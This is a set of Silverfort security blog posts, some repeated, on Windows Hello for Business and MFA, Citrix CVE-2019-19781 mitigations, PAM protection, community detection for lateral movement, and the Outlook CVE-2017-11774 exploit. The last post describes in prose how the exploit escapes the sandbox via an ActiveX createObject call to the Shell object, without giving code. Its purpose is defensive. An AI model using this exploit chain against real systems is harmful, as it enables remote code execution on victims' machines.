Let’s start with a thought experiment: what would happen if you got rid of password complexity requirements in the enterprise or if you removed the requirement to change passwords often? These changes are likely to have an immediate positive impact on the happiness levels of your employees. However, right after that, you would get hacked. That’s because both user endpoints and enterprise systems will become an easy target for hackers. So before you even begin thinking of getting rid of passwords, you need to ensure secure access to all endpoints and enterprise systems with something better than a password. Fortunately, combining Windows Hello for Business and Silverfort, you can achieve this. I will start with an overview of WHFB and how it should be used, and continue with explaining why it’s important to add Silverfort and how Silverfort can ensure secure access to everything on top of the endpoint. What is Windows Hello for Business (WHFB)? In an effort to go password-less, Microsoft introduced the ‘Windows Hello’ feature with the release of Windows 10. WHFB is a variant of this feature that is designed for corporates. The feature allows a secure way to access your device, Active Directory (AD) and Entra ID (formerly Azure AD) by leveraging the following capabilities: Device Unlock WHFB places great significance on your device, as it holds the keys to AD and Entra ID (formerly Azure AD). Therefore, it’s important to prevent malicious actors from unlocking the device and getting to those keys. However, I’m baffled by the choice to replace the passwords with pin-codes. Is that really enough to claim the login is now password-less? because a pin-code is not a password? Is that enough to protect the device? Thankfully, Microsoft offers additional factors for unlocking your device, which – if combined with the pin-code – should provide better-than-password-only-security for unlocking the device. Authentication to Active Directory (AD) Once you unlock your computer, you unlock a private key that’s saved on your TPM, and that private key can be used for Kerberos authentication with AD. If your endpoint policies allow storing cached credentials on the computer, when you logon – the computer will unlock without authenticating to Active Directory. Otherwise, if credentials aren’t cached, your computer will have to request a Kerberos TGT, and a host ticket before it unlocks. Forcing authentication to AD will be more secure than just relying on cached credentials. Authentication to Entra ID (formerly Azure AD) Authentication to Entra ID (formerly Azure AD) is similar, and also relies on the private key saved on the device. It’s better to require authentication to Entra ID (formerly Azure AD) before unlocking the device. Below is a figure that depicts the authentication flow with WHFB in a hybrid configuration. Is Multi-Factor Unlock the Same As Multi-Factor Authentication (MFA)? According to the way FIPS defines MFA, a physical token that requires something you know or are to unlock is considered MFA, because one factor is the physical token (something you have), and the other factor is the gesture you provide. According to this definition, the computer can be considered a physical token and WHFB can be formally considered MFA even if multi-factor unlock is disabled. The distinction is that if the resource that you want to protect is the device itself, you need multi-factor unlock to have MFA to it. If the resource that you want to protect is external to the device, WHFB without multi-factor unlock suffices. Of course, these are all formalities, and if you want best security you should always require multi-factor unlock. Which deployment and trust model should I choose? Microsoft has several deployment types to choose from. Hybrid Entra ID (formerly Azure AD) Joined Key Trust Deployment Hybrid Entra ID (formerly Azure AD) Joined Certificate Trust Deployment Entra ID (formerly Azure AD)Entra ID (formerly Azure AD) Join Single Sign-on Deployment Guides On Premises Key Trust Deployment On Premises Certificate Trust Deployment I don’t think many organizations can seriously consider the last 3 because most organizations aren’t ready to get rid of their AD, and are probably moving to the cloud (or will be soon). This leaves us with the Hybrid Azure AD Joined options. I recommend going with the Certificate Trust Deployment, because in addition to local logins it also enables security for remote desktop. What happens when users are offline? When I first tried WHFB, I was worried about not being able to login when my computer is offline. Microsoft’s diagrams show the authentication to Entra ID (formerly Azure AD) as a preliminary authentication flow for unlocking the device. In reality, this usually happens before the computer unlocks, but it’s not a necessary step to unlock your computer. So users will be able to unlock their computers even when they’re offline. This also means that we can’t rely on Entra ID (formerly Azure AD) for preventing unauthorized access to user devices. Improving the Security of WHFB There are four scenarios where WHFB leverages MFA: Multi-factor unlock Initial authentication to AD Initial authentication to Entra ID (formerly Azure AD) Device registration However, there’s one big unsolved issue – MFA is not required for accessing sensitive resources inside the network, after the initial login. This means that once the user is logged in, if the device has malware on it, the malware can steal the credentials (or a hash) and then it’s free to propagate throughout the network. To make things worse, Single-Sign-On (SSO) opens the door for the attacker to access all of the resources without any additional verification. What Doesn’t WHFB Cover? WHFB covers Entra ID (formerly Azure AD) and AD when the client is an updated Windows 10 device. But in many enterprise scenarios, this is not the case. Just to give a few examples: LDAP applications Applications that initiate Kerberos authentication as the client (not SSO) Macbooks Windows 7 Windows servers Linux We all have these in our environments, so you need to figure out how to protect them from unauthorized access. How Can Silverfort Help? Protecting Resources Within the Network Silverfort can enforce MFA and risk-based authentication to ensure secure access to sensitive resources within the corporate network and cloud environment. It’s important to note that Silverfort secures access to resources after the user device has been unlocked. You can use a solution like Silverfort to add Risk-Based Authentication to any of the systems that WHFB doesn’t cover. Then if you want to reduce the footprint of passwords, you can start by simplifying the password policy in the organization. If you’re adding MFA to all authentication scenarios with a password, the password doesn’t have to be as complex (you can even use a 6 digit pin-code), and it doesn’t have to be changed that often. This step already significantly reduces the cost of passwords management to the organization. The other part is gaining visibility to the access requests to applications – Silverfort helps you identify all access requests and gradually replace their authentication with a password-less authentication mechanism. Mobile MFA for the endpoint If you want to implement stronger security before unlocking user workstations, you can use Silverfort’s MFA solution as an additional authentication factor. Silverfort can work with out-of-band authentication, which can provide additional security over the factor Microsoft supports. In addition, Silverfort can add out-of-band authentication to devices that don’t support WHFB, such as Windows 7 devices. MFA for Remote Desktop Silverfort provides MFA for remote desktop, even if you chose to go with the Hybrid Entra ID (formerly Azure AD) Joined Key Trust Deployment. MFA for device registration The first step of registering a device to Entra ID (formerly Azure AD), typically requires MFA, and that can be achieved with Silverfort. How to Go Password-less Microsoft recommends the following steps for going password-less: 1. Develop a password replacement offering We all know that one factor is not enough. Therefore, removing the password poses a challenge for security, because now you need two factors other than a password. WHFB solves part of this challenge, but as mentioned earlier, it leaves other scenarios unprotected. Your password replacement has to include an alternative authentication factor that can protect all of your resources. 2. Reduce user-visible password surface area The first step here is enabling WHFB. Then, you probably want to use a solution like Silverfort to automatically map all the resources that still use passwords. 3. Transition into a password-less deployment That’s where it gets tricky. The applications that don’t support password-less authentication are going to make it difficult to achieve this step. As mentioned before, I recommend an intermediate step before that, which is enforcing MFA for these applications and at the same time reducing passwords’ length and complexity. 4. Eliminate passwords from the identity directory If your entire environment is covered by SSO, and login to all endpoints is based on Windows Hello for Business, you don’t need a password in your directory at all. However, I think most organizations have a long way to go before that would be possible. An Extended Password-less Strategy The strategy I recommend has a couple of more steps than Microsoft’s, but I think it’s a bit more practical, and it allows you to gain value very early in the process: Image: Recommended process for implementing a ‘passwordless’ strategy Most organizations will implement the top part of the process to improve the security of the organization. It will simplify the login process for most users accessing most applications allowing them to use a simple, easy to remember password. However organizations that want to eliminate passwords completely, will need to go through the additional steps. Final words: Whether you chose to implement a full passwordless strategy or not, I think the combination of Windows Hello for Business and a wide multi-factor authentication solution can significantly improve the user experience and the overall security posture of the organization. Enabling WHFB and Multi-Factor Unlock isn’t difficult. Implementing an MFA solution to secure access to your most sensitive assets – can be more challenging, depending on the solution you use. If you want to know how Silverfort can help you simplify the deployment as well as enable secure authentication for any sensitive system – without requiring software agents or in-line proxies – let us know. We’d be happy to help. Yaron Kassner, CTO and Co Founder, Silverfort Silverfort’s CTO and Co-Founder Yaron Kassner is a cybersecurity and big data technology expert. Before co-founding Silverfort, Yaron served as a big data expert consultant for Cisco. He also developed new capabilities involving big data analytics and machine learning algorithms at Microsoft. Prior to that Yaron served at the 8200 elite cyber unit of the Israel Defense Forces, where he led a reputable R&D team, raised to the rank of Captain, and received a prestigious excellence award. Yaron holds a B. Sc. in Mathematics, Summa Cum Laude, an M. Sc. and Ph. D. in Computer Science from the Technion – Israel Institute of Technology. Wishing you all Happy Holidays and a Wonderful and Safe 2020! Yaron Kassner --- - Published: 2019-12-25 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/recommended-mitigation-steps-for-vulnerability-in-citrix-adc-and-citrix-gateway-cve-2019019781/ *****By Yaron Kassner, CTO and Co Founder, Silverfort***** A recently identified vulnerability in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway allows, if exploited, an unauthenticated attacker to perform arbitrary code execution. The vulnerability has been assigned the CVE number: CVE-2019-19781. It is estimated that about 80K organizations are impacted. There is no patch available yet, but Citrix published recommended mitigations. For Silverfort customers, we recommend the following additional precautionary measures on top of the ones recommended by Citrix, to ensure that an already compromised device is not used for unauthorized access. Here are the recommended mitigation steps for Citrix ADC or Citrix Gateway users: Subscribe to the Citrix alerts so you will know when the fixed firmware is released: https://support. citrix. com/user/alerts Perform the mitigation steps recommended by Citrix as described here: https://support. citrix. com/article/CTX267679 Protect access to systems and applications accessible from your Citrix device with MFA: In addition to the steps recommended by Citrix, we recommend enforcing MFA to secure the authentication of users before granting them access to sensitive resources. Citrix enables you to enforce MFA on access through its devices to target systems. However, that solution isn’t enough: If a hacker already exploited the vulnerability and compromised the Citrix device, MFA will not be enforced on access by code running on the compromised Citrix device. In this case Silverfort can still enforce secure authentication whether the access originates from the compromised device or from a legitimate user. Monitor authentication activity and look for anomalies: Anomalies in authentication traffic originating from the Citrix device and authentication traffic targeting the systems that are accessible from the Citrix device should be seen in logs and should require further investigation. Silverfort’s AI-driven Risk engine can automatically identify these anomalies, and enforce a policy to alert in real time or block access. Things to look out for include: - High risk authentication - Unusually high load of authentication - Failed authentications - Authentication originating from the Citrix Gateway, which does not normally originate from there. For example, watch for file shares access (cifs Kerberos tickets) and RDP access (termsrv Kerberos tickets). - Authentication originating from the Citrix Gateway that is not directed to Citrix protected applications. It's important to remember that threats exist within our networks, not just outside it. We must consider the fact that adversaries may have already penetrated our networks and gained a foothold that enables further lateral movement and access to sensitive resources. In order to ensure authorized access to our systems we must validate the identity and enforce secure authentication on access from those already inside our networks, just as we require secure authentication to validate the identities of those coming from outside our networks through a VPN or other gateways. Yaron Kassner, CTO and Co Founder, Silverfort Silverfort’s CTO and Co-Founder Yaron Kassner is a cybersecurity and big data technology expert. Before co-founding Silverfort, Yaron served as a big data expert consultant for Cisco. He also developed new capabilities involving big data analytics and machine learning algorithms at Microsoft. Prior to that Yaron served at the 8200 elite cyber unit of the Israel Defense Forces, where he led a reputable R&D team, raised to the rank of Captain, and received a prestigious excellence award. Yaron holds a B. Sc. in Mathematics, Summa Cum Laude, an M. Sc. and Ph. D. in Computer Science from the Technion – Israel Institute of Technology. --- - Published: 2019-12-25 - Modified: 2024-09-16 - URL: https://www.silverfort.com/blog/recommended-mitigation-steps-for-vulnerability-in-citrix-adc-and-citrix-gateway-cve-2019019781-2/ A recently identified vulnerability in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway allows, if exploited, an unauthenticated attacker to perform arbitrary code execution. The vulnerability has been assigned the CVE number: CVE-2019-19781. It is estimated that about 80K organizations are impacted. There is no patch available yet, but Citrix published recommended mitigations. For Silverfort customers, we recommend the following additional precautionary measures on top of the ones recommended by Citrix, to ensure that an already compromised device is not used for unauthorized access. Here are the recommended mitigation steps for Citrix ADC or Citrix Gateway users: Subscribe to the Citrix alerts so you will know when the fixed firmware is released: https://support. citrix. com/user/alerts Perform the mitigation steps recommended by Citrix as described here: https://support. citrix. com/article/CTX267679 Protect access to systems and applications accessible from your Citrix device with MFA: In addition to the steps recommended by Citrix, we recommend enforcing MFA to secure the authentication of users before granting them access to sensitive resources. Citrix enables you to enforce MFA on access through its devices to target systems. However, that solution isn’t enough: If a hacker already exploited the vulnerability and compromised the Citrix device, MFA will not be enforced on access by code running on the compromised Citrix device. In this case Silverfort can still enforce secure authentication whether the access originates from the compromised device or from a legitimate user. Monitor authentication activity and look for anomalies: Anomalies in authentication traffic originating from the Citrix device and authentication traffic targeting the systems that are accessible from the Citrix device should be seen in logs and should require further investigation. Silverfort’s AI-driven Risk engine can automatically identify these anomalies, and enforce a policy to alert in real time or block access. Things to look out for include: - High risk authentication - Unusually high load of authentication - Failed authentications - Authentication originating from the Citrix Gateway, which does not normally originate from there. For example, watch for file shares access (cifs Kerberos tickets) and RDP access (termsrv Kerberos tickets). - Authentication originating from the Citrix Gateway that is not directed to Citrix protected applications. It's important to remember that threats exist within our networks, not just outside it. We must consider the fact that adversaries may have already penetrated our networks and gained a foothold that enables further lateral movement and access to sensitive resources. In order to ensure authorized access to our systems we must validate the identity and enforce secure authentication on access from those already inside our networks, just as we require secure authentication to validate the identities of those coming from outside our networks through a VPN or other gateways. --- - Published: 2019-11-18 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/pam-is-king-but-who-is-protecting-the-king/ --- By Jonathan Nativ, Sales Director, APAC, Silverfort --- In the game of chess, the king is the most important piece. Once your opponent gets your king, the game is over. Yet the king is a relatively vulnerable piece, and it’s protected by stronger ones like rooks, bishops and of course - the queen. In the IT world, Privileged Access Management (PAM) (many times referred to as a Password Vault) is the ‘King’ because it stores the keys to the kingdom - the credentials of the most important and sensitive users in the organization (privileged users) and many times it is used as the entry point into the organization for external users. Therefore, adversaries will do all they can in order to compromise it. What is a PAM Solution and Why is it Important to Protect? The PAM solution is a centralized repository where all the sensitive credentials are stored and managed. This includes: 1. Domain Administrator credentials 2. Database credentials 3. Cloud infrastructure credentials and access keys 4. Firewall passwords 5. Corporate Social Media Accounts 6. Many more One key thing to note about PAM solutions is that once implemented it becomes the single most sensitive system in the network, as it contains all the credentials of the most privileged users. According to Gartner, securing privileged accounts in an organization is a top priority security project these days. This is due to the fact that compromised credentials were used in more than 80% of data breaches. When attackers gain access to the network the first thing they are going to look for are privileged credentials. These credentials will allow them to access high value assets, move laterally in the network and install malicious software. What if one of your system administrators (that uses the PAM solution) falls victim to a Phishing Attack and their personal credentials are stolen? If those credentials allow access to the PAM solution, the attacker now has access to all the credentials, that have been conveniently stored in one central location. If an adversary gains access to the PAM solution he or she literally gains unlimited access to any sensitive system in the network. Adding Multi-Factor Authentication (MFA) provides a critical layer of security against the use of stolen user credentials. For that reason, PAM vendors highly recommend to always implement an MFA solution together with the PAM solution. So How Should I Protect my King? In a recent paper published by Deloitte, PAM and MFA are ranked as the 2 top identity initiatives for enterprises, with equal importance. These two important initiatives go hand in hand – putting all your sensitive passwords in one place doesn’t make much sense if attackers could easily access it with yet another password. Once the PAM solution is protected with MFA, even if an attacker gets stolen credentials of a system administrator, the attacker will not be able to access the PAM solution. This is because an additional factor of authentication (like a token or approval through a mobile application) is required from the user before access will be granted. When selecting and implementing an MFA solution, it is key to make sure that all the interfaces to the PAM solution are protected by MFA – not just the front door. This may be easier said than done. Let me explain: Most PAM solutions have several interfaces, including: 1. Web Portal Access - used for credential retrieval as well as administrative tasks 2. Proxy Access - used by system administrators to connect to systems using vaulted credentials (this is the preferred method by system administrators as it is more transparent). 3. API Access - used for automated tasks and service accounts The image above shows a basic high level architecture of a typical PAM solution. Here Comes the Queen To offer real protection, an MFA solution must provide a way to secure each interface into the PAM system. Without protecting all the interfaces, you are leaving a vulnerability in the system that will allow an attacker to get in. In many cases MFA is not implemented on all the PAM interfaces due to the complex integration requirements. In most cases MFA implementations require agents or proxies as well as changes to the network architecture. As PAM solutions are often delivered as a “black box” appliance, it’s not possible to install agents or make changes to the code. MFA solutions that are based on RADIUS are complex to implement and provide bad user experience due to that fact that One Time Passwords (OTP) are needed to be typed for each session that is opened (keep in mind that administrators might open countless sessions every day – so it becomes a nuisance). Silverfort’s agentless and proxy-less solution enables MFA on all PAM interfaces without the need to make complex changes to the system or the environment. Thanks to Silverfort’s agentless architecture it is also possible to protect all the interfaces to the PAM solution, including the web interface, GUI client, API and Proxies, without the need to perform MFA again and again for each session. When choosing an MFA vendor, it is also important to take into consideration the end user experience. IT administrators (that use privileged accounts) are usually very sensitive to changes in their workflow. They are also using the PAM solution multiple times in the span of an hour, so any inconvenience can have major impact on productivity. In most cases the users are storing the credentials for the PAM Solution in their browsers or connection managers to make their life easier. Other aspects that should be considered when choosing an MFA provider for a PAM solution: 1. Changes to current workflows 2. Ability to open multiple sessions at the same time without multiple MFA challenges 3. Easy-to-use MFA options such as soft tokens and mobile MFA apps 4. Ability to trigger MFA only once within a given time frame 5. Risk-based MFA that considers user behavior and context Silverfort’s risk-based authentication solution is flexible and enables it to provide a balance between security and user experience by allowing users to authenticate with MFA only once in a while, while keeping them secured all the time. This, together with the adaptive risk-based approach, makes it an ideal MFA solution for a PAM implementation. Final Words PAM is a critical security layer for organizations. PAM projects require a significant amount of time and recourses. Does it make sense to go through all the trouble to lock the door but leave the window open? MFA should be added to protect your PAM solution from day one. It should be considered an integral part of the PAM solution and be used to secure access through all routes and interfaces in order to protect the most important assets in your network. --- - Published: 2019-08-14 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/detecting-and-predicting-malicious-access-in-enterprise-networks-using-the-louvain-community-detection-algorithm/ By Gal Sadeh, Sr. Data Scientist, Silverfort Many data breaches start with gaining access to an insignificant computer and propagating by jumping from one computer to another until reaching the valuable ‘crown jewels’, like admin credentials, information about an important DB holding customer data and more. Detecting and preventing these attacks is a very complicated task for security professionals since the number of possible attack paths is extremely high and networks change frequently (new entities are added or removed, permissions are changed etc. ). Most of the techniques for detecting attacks are based on recognition of known malicious patterns, but for complex attacks this is no longer enough. When the attack doesn’t have a known recognizable pattern it’s extremely hard to detect it. Our initial attempts with attack detection Since Silverfort analyzes authentication and access data monitored over the entire enterprise network and cloud environments – it needs to analyze a lot of data. However, it took a few attempts to decide what would be the best way to analyze all this data to detect unknown threats. I gave this question a lot of thought. At first, I thought to map all the possible access paths based on the data and try to detect the vulnerable ones. However, this approach becomes almost impossible to implement when the network contains many entities, since the number of possible access paths grows exponentially with the number of entities. I tried to improve this method by eliminating some of the access paths. For example, if a user doesn’t have permissions in the directory to access a certain server – we can eliminate that path. This approach helped us process a large amount of access paths, but it wasn’t enough, because even without permissions an access path might be possible through exploitation of vulnerabilities. So, we decided to try a different approach: we divided the network to communities, based on the fact that members of a community communicate with each other, and other shared resources, more than with other entities in the network. Let me further explain: What are communities and what are community detection algorithms? Networks can be modelled as graphs of connections (edges) between nodes, where each node represents an entity (user, computer, etc. ) and each edge connecting between the nodes represents a logical connection. For example, if a user accesses a server, the user and server would be the ‘nodes’ and the connection between them would be represented by an ‘edge’. Each edge is also associated with a weight that represents the strength of the connection, which is based on the number of authentication and access requests we see on this edge. The way community detection algorithms work is taking a raw graph as input, analyzing it and assigning each node to a community. Each community is characterized by its ‘density’ which is the relationship between the weights of all the edges and the number of nodes in the community. Most community detection algorithms have an ‘objective’ which is a number that represents the overall compatibility of the nodes to the communities they were assigned to. The goal is to maximize that number. A larger objective means ‘High Density’ communities. Note that different algorithms may have slightly different ‘objectives’. Assigning nodes to communities using the Louvain algorithm We selected the Louvain algorithm because it is a well-known algorithm that runs very fast even in large complex networks – its run time is almost linear to the network’s size. The algorithm tries to maximize its objective by repeating these two phases: It assigns each node in the graph to a single community. For each edge connecting between node u and node v, the algorithm checks if merging the communities of u and v increases the objective, and if so, it performs the merge. The algorithm builds a new graph, where each community is represented by a single node, and the weight assigned to the edge between the communities is the sum of the weights of all the edges between the merged nodes of each community. The algorithm stops when there is no step that increases the objective. The output is an induced graph, where nodes represent communities. For our implementation we used a Python package called “community”. Further reading material can be found here: http://www. emilio. ferrara. name/wp-content/uploads/2011/07/isda2011-k-path. pdf Community detection and cyber security Since each community is dense, meaning there are many access paths between the nodes, if an attacker gains access to one of the entities (user account or device) in a community, it would be easier for him or her to gain access to other entities in that community. Obviously, it’s harder for an attacker to expand to other communities since there are less access paths between different communities. If used correctly, community detection can help identify suspicious activity within a network, predict lateral movement paths and enforce smarter policies in real time. How Silverfort fits in When Silverfort’s Risk-Based Authentication Platform is deployed in a network, it monitors all the authentication and access activity between the various entities and constructs a graph as previously described. The raw graph looks like this: Each circle is a user and each triangle is a server. The weights on the edges are determined by the number of authentication and access requests monitored, and permissions associated with the different nodes (for simplicity, weights are not shown on the graph). Then we use the Louvain algorithm to identify communities in the network. After identifying the communities, the map will look like this: Now, we spot nodes that communicate with entities in communities they aren’t a part of. Those nodes would be valuable targets for attackers, because they are the only points of access between communities. Therefore, an attacker will have to go through them in order to spread to other communities. Securing the edges (connections) of these nodes is important for preventing an attack from spreading in the network. Using Silverfort’s authentication policies, companies can respond automatically to detected threats by enforcing step-up authentication to validate the user’s identity or blocking access altogether. This is true both for user-to-machine and machine-to-machine communication. Identifying the communities and the valuable cross-community connections that would be targeted by attackers, helps Silverfort customers in setting smart secure authentication policies. The community graph can also help admins identify misconfigurations in their networks. In the graph below, some of the valuable nodes and connections that should be secured are marked in purple. How is it leveraged today? Some of our customers are already using Silverfort’s community analysis (which is part of our AI-based risk engine) to identify communities and cross community connections in their networks, identify misconfigurations and ‘weak spots’ that should be secured, and detect abnormal activity. Now, we are helping customers make the next step – applying real-time secure authentication policies in response to detected threats, and effectively preventing lateral movement in their networks and cloud environments. Gal Sadeh, Sr. Data Scientist, Silverfort Gal is a Senior Data Scientist in Silverfort’s research team. He is responsible for big data analytics and developing AI engines. He joined Silverfort after many years of research and leadership roles at the 8200 elite cyber unit of the Israel Defense Forces. Gal holds a B. Sc. in Mathematics and Computer Science from Tel Aviv University. --- - Published: 2019-08-14 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/detecting-and-predicting-malicious-access-in-enterprise-networks-using-the-louvain-community-detection-algorithm-2/ By Gal Sadeh, Sr. Data Scientist, Silverfort Many data breaches start with gaining access to an insignificant computer and propagating by jumping from one computer to another until reaching the valuable ‘crown jewels’, like admin credentials, information about an important DB holding customer data and more. Detecting and preventing these attacks is a very complicated task for security professionals since the number of possible attack paths is extremely high and networks change frequently (new entities are added or removed, permissions are changed etc. ). Most of the techniques for detecting attacks are based on recognition of known malicious patterns, but for complex attacks this is no longer enough. When the attack doesn’t have a known recognizable pattern it’s extremely hard to detect it. Our initial attempts with attack detection Since Silverfort analyzes authentication and access data monitored over the entire enterprise network and cloud environments – it needs to analyze a lot of data. However, it took a few attempts to decide what would be the best way to analyze all this data to detect unknown threats. I gave this question a lot of thought. At first, I thought to map all the possible access paths based on the data and try to detect the vulnerable ones. However, this approach becomes almost impossible to implement when the network contains many entities, since the number of possible access paths grows exponentially with the number of entities. I tried to improve this method by eliminating some of the access paths. For example, if a user doesn’t have permissions in the directory to access a certain server – we can eliminate that path. This approach helped us process a large amount of access paths, but it wasn’t enough, because even without permissions an access path might be possible through exploitation of vulnerabilities. So, we decided to try a different approach: we divided the network to communities, based on the fact that members of a community communicate with each other, and other shared resources, more than with other entities in the network. Let me further explain: What are communities and what are community detection algorithms? Networks can be modelled as graphs of connections (edges) between nodes, where each node represents an entity (user, computer, etc. ) and each edge connecting between the nodes represents a logical connection. For example, if a user accesses a server, the user and server would be the ‘nodes’ and the connection between them would be represented by an ‘edge’. Each edge is also associated with a weight that represents the strength of the connection, which is based on the number of authentication and access requests we see on this edge. The way community detection algorithms work is taking a raw graph as input, analyzing it and assigning each node to a community. Each community is characterized by its ‘density’ which is the relationship between the weights of all the edges and the number of nodes in the community. Most community detection algorithms have an ‘objective’ which is a number that represents the overall compatibility of the nodes to the communities they were assigned to. The goal is to maximize that number. A larger objective means ‘High Density’ communities. Note that different algorithms may have slightly different ‘objectives’. Assigning nodes to communities using the Louvain algorithm We selected the Louvain algorithm because it is a well-known algorithm that runs very fast even in large complex networks – its run time is almost linear to the network’s size. The algorithm tries to maximize its objective by repeating these two phases: It assigns each node in the graph to a single community. For each edge connecting between node u and node v, the algorithm checks if merging the communities of u and v increases the objective, and if so, it performs the merge. The algorithm builds a new graph, where each community is represented by a single node, and the weight assigned to the edge between the communities is the sum of the weights of all the edges between the merged nodes of each community. The algorithm stops when there is no step that increases the objective. The output is an induced graph, where nodes represent communities. For our implementation we used a Python package called “community”. Further reading material can be found here: http://www. emilio. ferrara. name/wp-content/uploads/2011/07/isda2011-k-path. pdf Community detection and cyber security Since each community is dense, meaning there are many access paths between the nodes, if an attacker gains access to one of the entities (user account or device) in a community, it would be easier for him or her to gain access to other entities in that community. Obviously, it’s harder for an attacker to expand to other communities since there are less access paths between different communities. If used correctly, community detection can help identify suspicious activity within a network, predict lateral movement paths and enforce smarter policies in real time. How Silverfort fits in When Silverfort’s Risk-Based Authentication Platform is deployed in a network, it monitors all the authentication and access activity between the various entities and constructs a graph as previously described. The raw graph looks like this: Each circle is a user and each triangle is a server. The weights on the edges are determined by the number of authentication and access requests monitored, and permissions associated with the different nodes (for simplicity, weights are not shown on the graph). Then we use the Louvain algorithm to identify communities in the network. After identifying the communities, the map will look like this: Now, we spot nodes that communicate with entities in communities they aren’t a part of. Those nodes would be valuable targets for attackers, because they are the only points of access between communities. Therefore, an attacker will have to go through them in order to spread to other communities. Securing the edges (connections) of these nodes is important for preventing an attack from spreading in the network. Using Silverfort’s authentication policies, companies can respond automatically to detected threats by enforcing step-up authentication to validate the user’s identity or blocking access altogether. This is true both for user-to-machine and machine-to-machine communication. Identifying the communities and the valuable cross-community connections that would be targeted by attackers, helps Silverfort customers in setting smart secure authentication policies. The community graph can also help admins identify misconfigurations in their networks. In the graph below, some of the valuable nodes and connections that should be secured are marked in purple. How is it leveraged today? Some of our customers are already using Silverfort’s community analysis (which is part of our AI-based risk engine) to identify communities and cross community connections in their networks, identify misconfigurations and ‘weak spots’ that should be secured, and detect abnormal activity. Now, we are helping customers make the next step – applying real-time secure authentication policies in response to detected threats, and effectively preventing lateral movement in their networks and cloud environments. Gal Sadeh, Sr. Data Scientist, Silverfort Gal is a Senior Data Scientist in Silverfort’s research team. He is responsible for big data analytics and developing AI engines. He joined Silverfort after many years of research and leadership roles at the 8200 elite cyber unit of the Israel Defense Forces. Gal holds a B. Sc. in Mathematics and Computer Science from Tel Aviv University. --- - Published: 2019-07-11 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/blocking-office365-attacks-cve-2017-11774-with-mfa/ US Cyber command has recently published a security alert on Twitter regarding abuse of an Outlook vulnerability https://twitter. com/CNMF_VirusAlert/status/1146130046127681536. This vulnerability was originally found and reported by SensePost back in 2017 – see here: https://sensepost. com/blog/2017/outlook-home-page-another-ruler-vector/ A patch has been available since then, but the vulnerability is still being actively abused. How does it Work? It is an interesting attack vector, allowing remote code execution (RCE) given compromised Office 365 credentials: The exploit takes advantage of a feature of Outlook’s Home Page, which can open a web page each time a folder is opened in Outlook. Why would you want to do this? One example floating online is to have a quick link to SharePoint from inside the Outlook application. The is a legacy feature, which Microsoft’s security fix removed. This is an example of why legacy features are dangerous to keep in your software – a topic for a different blog. The home page URL is stored inside of the folder settings. Where are the folder settings defined? If the server is synced from an on-premises Exchange server, then on that server. If this folder is synced from Outlook 365, then from there. This attack vector exploits the sync from the Office 365 server to the actual computer. How does this translate into a remote code execution attack? Until now we have described how to open a webpage given access to the user’s Office 365 account. But how does this translate into a remote code execution attack? Given that the webpage is loaded by an Internet Explorer frame, the first course of action is to look at loading ActiveX controls. Although there are restrictions on which ActiveX controls can be loaded, the hackers found a way to work around these restrictions. There is an Outlook ActiveX control that is whitelisted to run in the sandbox. This is an object that represents the container running the current code, i. e. , the Outlook application. This object has a function called “createObject”, which allows creation of any arbitrary object, including the “Shell” object. This final object allows execution of any application and thus enables escaping from the sandbox. This serves as a reminder that sandboxes are not bullet proof. Recommendations: There are two key recommendations: First of all, be sure to patch all you users’ systems. A patch for this vulnerability was released way back in October 2017. There is no reason to leave any systems unpatched. In addition, we highly recommend enforcing MFA to block this and similar attacks: Enforcing MFA for users’ access to Outlook app and Office 365 accounts will stop this attack chain at its root as attackers won’t be able to authenticate with the 2nd factor and as a result, they won’t be able to access the Office 365 account. Even given the vulnerabilities in the Outlook application, access to Office365 is necessary to exploit the vulnerability and enable a remote code execution scenario. Yaron Kassner, CTO and Co Founder, Silverfort Silverfort’s CTO and Co-Founder Yaron Kassner is a cybersecurity and big data technology expert. Before co-founding Silverfort, Yaron served as a big data expert consultant for Cisco. He also developed new capabilities involving big data analytics and machine learning algorithms at Microsoft. Prior to that Yaron served at the 8200 elite cyber unit of the Israel Defense Forces, where he led a reputable R&D team, raised to the rank of Captain, and received a prestigious excellence award. Yaron holds a B. Sc. in Mathematics, Summa Cum Laude, an M. Sc. and Ph. D. in Computer Science from the Technion – Israel Institute of Technology. --- - Published: 2019-07-11 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/blocking-office365-attacks-cve-2017-11774-with-mfa-2/ US Cyber command has recently published a security alert on Twitter regarding abuse of an Outlook vulnerability https://twitter. com/CNMF_VirusAlert/status/1146130046127681536. This vulnerability was originally found and reported by SensePost back in 2017 – see here: https://sensepost. com/blog/2017/outlook-home-page-another-ruler-vector/ A patch has been available since then, but the vulnerability is still being actively abused. How does it Work? It is an interesting attack vector, allowing remote code execution (RCE) given compromised Office 365 credentials: The exploit takes advantage of a feature of Outlook’s Home Page, which can open a web page each time a folder is opened in Outlook. Why would you want to do this? One example floating online is to have a quick link to SharePoint from inside the Outlook application. The is a legacy feature, which Microsoft’s security fix removed. This is an example of why legacy features are dangerous to keep in your software – a topic for a different blog. The home page URL is stored inside of the folder settings. Where are the folder settings defined? If the server is synced from an on-premises Exchange server, then on that server. If this folder is synced from Outlook 365, then from there. This attack vector exploits the sync from the Office 365 server to the actual computer. How does this translate into a remote code execution attack? Until now we have described how to open a webpage given access to the user’s Office 365 account. But how does this translate into a remote code execution attack? Given that the webpage is loaded by an Internet Explorer frame, the first course of action is to look at loading ActiveX controls. Although there are restrictions on which ActiveX controls can be loaded, the hackers found a way to work around these restrictions. There is an Outlook ActiveX control that is whitelisted to run in the sandbox. This is an object that represents the container running the current code, i. e. , the Outlook application. This object has a function called “createObject”, which allows creation of any arbitrary object, including the “Shell” object. This final object allows execution of any application and thus enables escaping from the sandbox. This serves as a reminder that sandboxes are not bullet proof. Recommendations: There are two key recommendations: First of all, be sure to patch all you users’ systems. A patch for this vulnerability was released way back in October 2017. There is no reason to leave any systems unpatched. In addition, we highly recommend enforcing MFA to block this and similar attacks: Enforcing MFA for users’ access to Outlook app and Office 365 accounts will stop this attack chain at its root as attackers won’t be able to authenticate with the 2nd factor and as a result, they won’t be able to access the Office 365 account. Even given the vulnerabilities in the Outlook application, access to Office365 is necessary to exploit the vulnerability and enable a remote code execution scenario. Yaron 